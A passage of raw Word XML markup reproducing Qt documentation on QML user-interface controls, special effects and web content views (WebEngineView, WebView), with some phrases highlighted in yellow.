            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Integrating JavaScript in QML</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2967" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Scalability</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="0008522D" w:rsidRDefault="00C10CB8" w:rsidP="0008522D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2669" w:name="buttons-menus-and-other-controls"/>
      <w:bookmarkStart w:id="2670" w:name="_Toc483001114"/>
      <w:bookmarkStart w:id="2671" w:name="_Toc483004083"/>
      <w:bookmarkStart w:id="2672" w:name="_Toc483604447"/>
      <w:bookmarkStart w:id="2673" w:name="_Toc483605667"/>
      <w:bookmarkEnd w:id="2669"/>
      <w:r w:rsidRPr="0008522D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Buttons, Menus, and other Controls</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2670"/>
      <w:bookmarkEnd w:id="2671"/>
      <w:bookmarkEnd w:id="2672"/>
      <w:bookmarkEnd w:id="2673"/>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 xml:space="preserve">For a </w:t>
      </w:r>
      <w:r w:rsidRPr="00605096">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set of basic UI controls</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the </w:t>
      </w:r>
      <w:hyperlink r:id="rId2968" w:history="1">
        <w:r w:rsidRPr="00605096">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Controls</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0008522D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00605096">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> implements several controls such as buttons, menus, and views. These controls </w:t>
      </w:r>
      <w:r w:rsidRPr="00605096">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mimic the native behavior found in different platforms such as Windows, macOS, and Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2969" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Qt Quick Controls Overview</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2970" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Styles</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2971" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Dialogs</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2972" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Layouts</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2973" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Extras</w:t>
        </w:r>
      </w:hyperlink>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A second set of UI controls,</w:t>
      </w:r>
      <w:r w:rsidR="0008522D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00605096">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick Controls 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, was </w:t>
      </w:r>
      <w:r w:rsidRPr="00605096">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>designed for use on embedded systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, where the </w:t>
      </w:r>
      <w:r w:rsidRPr="00605096">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hardware has limited resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. For a comparison of the two sets of controls, see </w:t>
      </w:r>
      <w:hyperlink r:id="rId2974" w:history="1">
        <w:r w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Differences between Qt Quick Controls</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2975" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Qt Quick Controls 2 Guidelines</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2976" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Qt Quick Templates 2</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="0008522D" w:rsidRDefault="00C10CB8" w:rsidP="0008522D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2674" w:name="special-effects"/>
      <w:bookmarkStart w:id="2675" w:name="_Toc483001115"/>
      <w:bookmarkStart w:id="2676" w:name="_Toc483004084"/>
      <w:bookmarkStart w:id="2677" w:name="_Toc483604448"/>
      <w:bookmarkStart w:id="2678" w:name="_Toc483605668"/>
      <w:bookmarkEnd w:id="2674"/>
      <w:r w:rsidRPr="0008522D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Special Effects</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2675"/>
      <w:bookmarkEnd w:id="2676"/>
      <w:bookmarkEnd w:id="2677"/>
      <w:bookmarkEnd w:id="2678"/>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00C10CB8" w:rsidP="00C10CB8">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00605096">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Several Qt modules provide types for creating special effects in applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Their respective pages contain more information about specific uses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2977" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Particle Effects</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2978" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Graphical Effects</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> - for creating image composition effects.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="0008522D" w:rsidRDefault="00C10CB8" w:rsidP="0008522D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2679" w:name="viewing-web-content-in-qml-applications"/>
      <w:bookmarkStart w:id="2680" w:name="_Toc483001116"/>
      <w:bookmarkStart w:id="2681" w:name="_Toc483004085"/>
      <w:bookmarkStart w:id="2682" w:name="_Toc483604449"/>
      <w:bookmarkStart w:id="2683" w:name="_Toc483605669"/>
      <w:bookmarkEnd w:id="2679"/>
      <w:r w:rsidRPr="0008522D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Viewing Web Content in QML Applications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2680"/>
      <w:bookmarkEnd w:id="2681"/>
      <w:bookmarkEnd w:id="2682"/>
      <w:bookmarkEnd w:id="2683"/>
    </w:p>
    <w:p w:rsid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The QML types,</w:t>
      </w:r>
      <w:r w:rsidR="0008522D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2979" w:history="1">
        <w:r w:rsidRPr="00605096">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>WebEngineView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0008522D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00605096">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="0008522D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2980" w:history="1">
        <w:r w:rsidRPr="00605096">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>WebView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00605096">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>render and display dynamic web content</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The only difference between the two is that the </w:t>
      </w:r>
      <w:r w:rsidRPr="00605096">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>latter uses a native web view if available</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Both these types </w:t>
      </w:r>
      <w:r w:rsidRPr="00605096">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can load a URL or an HTML string</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. To read more about them and view code samples, see </w:t>
      </w:r>
      <w:hyperlink r:id="rId2981" w:history="1">
        <w:r w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt WebEngine</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId2982" w:history="1">
        <w:r w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt WebView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F06D42" w:rsidRPr="00F06D42" w:rsidRDefault="00F06D42" w:rsidP="00C10CB8">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
